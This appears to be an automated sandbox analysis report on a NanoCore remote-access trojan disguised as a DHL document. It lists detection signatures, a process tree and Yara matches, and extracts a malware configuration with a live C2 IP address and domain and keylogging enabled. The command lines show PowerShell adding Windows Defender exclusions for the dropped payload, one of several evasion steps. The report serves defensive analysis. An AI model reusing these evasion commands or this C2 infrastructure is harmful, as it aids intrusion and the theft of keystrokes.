Play interactive tour

Edit tour

Analysis Report DHL_document1102202068090891.exe

Overview

General Information

Sample Name:	DHL_document1102202068090891.exe
Analysis ID:	358257
MD5:	5e86ec60bc329db96be8d476537a554c
SHA1:	2881b03bd6a77dc83774e29a93746b52dbb5f568
SHA256:	5b60eef7b62c70f68311f80199578144694445d28286c7c87e7f79ace2875580
Tags:	CHNDHLexegeoNanoCoreRAT
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

System process connects to network (likely due to code injection or exploit)

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Binary contains a suspicious time stamp

C2 URLs / IPs found in malware configuration

Changes security center settings (notifications, updates, antivirus, firewall)

Contains functionality to hide a thread from the debugger

Creates an autostart registry key pointing to binary in C:\Windows

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Executable has a suspicious name (potential lure to open the executable)

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Suspicious Svchost Process

Sigma detected: System File Execution Location Anomaly

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to detect virtual machines (SGDT)

Contains functionality to detect virtual machines (SIDT)

Contains functionality to detect virtual machines (SMSW)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains strange resources

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

DHL_document1102202068090891.exe (PID: 5308 cmdline: 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' MD5: 5E86EC60BC329DB96BE8D476537A554C)

powershell.exe (PID: 6016 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

AdvancedRun.exe (PID: 1864 cmdline: 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

AdvancedRun.exe (PID: 6344 cmdline: 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /SpecialRun 4101d8 1864 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)

powershell.exe (PID: 6624 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6644 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 6832 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

CasPol.exe (PID: 2900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)

WerFault.exe (PID: 5196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2256 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 1000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4616 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4564 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1056 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1036 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 2588 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6328 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

explorer.exe (PID: 6384 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 6444 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 6560 cmdline: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' MD5: 5E86EC60BC329DB96BE8D476537A554C)

svchost.exe (PID: 6652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

explorer.exe (PID: 6840 cmdline: 'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' MD5: AD5296B280E8F522A8A897C96BAB0E1D)

explorer.exe (PID: 6956 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: AD5296B280E8F522A8A897C96BAB0E1D)

svchost.exe (PID: 7148 cmdline: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' MD5: 5E86EC60BC329DB96BE8D476537A554C)

svchost.exe (PID: 7084 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5304 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 5044 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 5240 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "933bebd4-0378-4b22-a9fe-1200446be5", "Group": "", "Domain1": "185.157.160.229", "Domain2": "noancore.linkpc.net", "Port": 6700, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29980, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2f3d:$a: NanoCore 0x2f96:$a: NanoCore 0x2fd3:$a: NanoCore 0x304c:$a: NanoCore 0x166f7:$a: NanoCore 0x1670c:$a: NanoCore 0x16741:$a: NanoCore 0x2f1cb:$a: NanoCore 0x2f1e0:$a: NanoCore 0x2f215:$a: NanoCore 0x2f9f:$b: ClientPlugin 0x2fdc:$b: ClientPlugin 0x38da:$b: ClientPlugin 0x38e7:$b: ClientPlugin 0x164b3:$b: ClientPlugin 0x164ce:$b: ClientPlugin 0x164fe:$b: ClientPlugin 0x16715:$b: ClientPlugin 0x1674a:$b: ClientPlugin 0x2ef87:$b: ClientPlugin 0x2efa2:$b: ClientPlugin
0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10205:$x1: NanoCore.ClientPluginHost 0x43025:$x1: NanoCore.ClientPluginHost 0x75c45:$x1: NanoCore.ClientPluginHost 0x10242:$x2: IClientNetworkHost 0x43062:$x2: IClientNetworkHost 0x75c82:$x2: IClientNetworkHost 0x13d75:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46b95:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x797b5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff6d:$a: NanoCore 0xff7d:$a: NanoCore 0x101b1:$a: NanoCore 0x101c5:$a: NanoCore 0x10205:$a: NanoCore 0x42d8d:$a: NanoCore 0x42d9d:$a: NanoCore 0x42fd1:$a: NanoCore 0x42fe5:$a: NanoCore 0x43025:$a: NanoCore 0x759ad:$a: NanoCore 0x759bd:$a: NanoCore 0x75bf1:$a: NanoCore 0x75c05:$a: NanoCore 0x75c45:$a: NanoCore 0xffcc:$b: ClientPlugin 0x101ce:$b: ClientPlugin 0x1020e:$b: ClientPlugin 0x42dec:$b: ClientPlugin 0x42fee:$b: ClientPlugin 0x4302e:$b: ClientPlugin
00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10135:$x1: NanoCore.ClientPluginHost 0x42f55:$x1: NanoCore.ClientPluginHost 0x75b75:$x1: NanoCore.ClientPluginHost 0x10172:$x2: IClientNetworkHost 0x42f92:$x2: IClientNetworkHost 0x75bb2:$x2: IClientNetworkHost 0x13ca5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46ac5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x796e5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfe9d:$a: NanoCore 0xfead:$a: NanoCore 0x100e1:$a: NanoCore 0x100f5:$a: NanoCore 0x10135:$a: NanoCore 0x42cbd:$a: NanoCore 0x42ccd:$a: NanoCore 0x42f01:$a: NanoCore 0x42f15:$a: NanoCore 0x42f55:$a: NanoCore 0x758dd:$a: NanoCore 0x758ed:$a: NanoCore 0x75b21:$a: NanoCore 0x75b35:$a: NanoCore 0x75b75:$a: NanoCore 0xfefc:$b: ClientPlugin 0x100fe:$b: ClientPlugin 0x1013e:$b: ClientPlugin 0x42d1c:$b: ClientPlugin 0x42f1e:$b: ClientPlugin 0x42f5e:$b: ClientPlugin
0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10b2d:$x1: NanoCore.ClientPluginHost 0x4394d:$x1: NanoCore.ClientPluginHost 0x7656d:$x1: NanoCore.ClientPluginHost 0x10b6a:$x2: IClientNetworkHost 0x4398a:$x2: IClientNetworkHost 0x765aa:$x2: IClientNetworkHost 0x1469d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x474bd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7a0dd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10895:$a: NanoCore 0x108a5:$a: NanoCore 0x10ad9:$a: NanoCore 0x10aed:$a: NanoCore 0x10b2d:$a: NanoCore 0x436b5:$a: NanoCore 0x436c5:$a: NanoCore 0x438f9:$a: NanoCore 0x4390d:$a: NanoCore 0x4394d:$a: NanoCore 0x762d5:$a: NanoCore 0x762e5:$a: NanoCore 0x76519:$a: NanoCore 0x7652d:$a: NanoCore 0x7656d:$a: NanoCore 0x108f4:$b: ClientPlugin 0x10af6:$b: ClientPlugin 0x10b36:$b: ClientPlugin 0x43714:$b: ClientPlugin 0x43916:$b: ClientPlugin 0x43956:$b: ClientPlugin
Process Memory Space: svchost.exe PID: 6560	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1e90b2:$x1: NanoCore.ClientPluginHost 0x207c60:$x1: NanoCore.ClientPluginHost 0x226720:$x1: NanoCore.ClientPluginHost 0x1e9113:$x2: IClientNetworkHost 0x207cc1:$x2: IClientNetworkHost 0x226781:$x2: IClientNetworkHost 0x1ee518:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1fc48a:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x20d0c6:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x21b038:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x22bb86:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x239af8:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: svchost.exe PID: 6560	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: svchost.exe PID: 6560	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1e8bb7:$a: NanoCore 0x1e8bd3:$a: NanoCore 0x1e8d2e:$a: NanoCore 0x1e8d3d:$a: NanoCore 0x1e9016:$a: NanoCore 0x1e9042:$a: NanoCore 0x1e90b2:$a: NanoCore 0x1f8af4:$a: NanoCore 0x1f8b06:$a: NanoCore 0x1f8b42:$a: NanoCore 0x207765:$a: NanoCore 0x207781:$a: NanoCore 0x2078dc:$a: NanoCore 0x2078eb:$a: NanoCore 0x207bc4:$a: NanoCore 0x207bf0:$a: NanoCore 0x207c60:$a: NanoCore 0x2176a2:$a: NanoCore 0x2176b4:$a: NanoCore 0x2176f0:$a: NanoCore 0x226225:$a: NanoCore
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
28.2.svchost.exe.4806e98.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
28.2.svchost.exe.4806e98.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
28.2.svchost.exe.4806e98.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
28.2.svchost.exe.4806e98.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
29.2.CasPol.exe.3ddff94.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
29.2.CasPol.exe.3ddff94.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
29.2.CasPol.exe.3ddff94.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
29.2.CasPol.exe.5ae0000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
29.2.CasPol.exe.5ae0000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
29.2.CasPol.exe.5ae0000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
29.2.CasPol.exe.3ddb15e.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d0b7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0e4:$x2: IClientNetworkHost
29.2.CasPol.exe.3ddb15e.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d0b7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e192:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0d1:$s5: IClientLoggingHost
29.2.CasPol.exe.3ddb15e.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
29.2.CasPol.exe.3ddb15e.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d06d:$a: NanoCore 0x2d082:$a: NanoCore 0x2d0b7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce29:$b: ClientPlugin 0x2ce44:$b: ClientPlugin
29.2.CasPol.exe.3ddff94.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28281:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x282ae:$x2: IClientNetworkHost
29.2.CasPol.exe.3ddff94.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28281:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2935c:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x2829b:$s5: IClientLoggingHost
29.2.CasPol.exe.3ddff94.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
29.2.CasPol.exe.2dfb8c8.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
29.2.CasPol.exe.3de45bd.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c58:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c85:$x2: IClientNetworkHost
29.2.CasPol.exe.3de45bd.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c58:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d33:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c72:$s5: IClientLoggingHost
29.2.CasPol.exe.3de45bd.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
29.2.CasPol.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
29.2.CasPol.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
29.2.CasPol.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
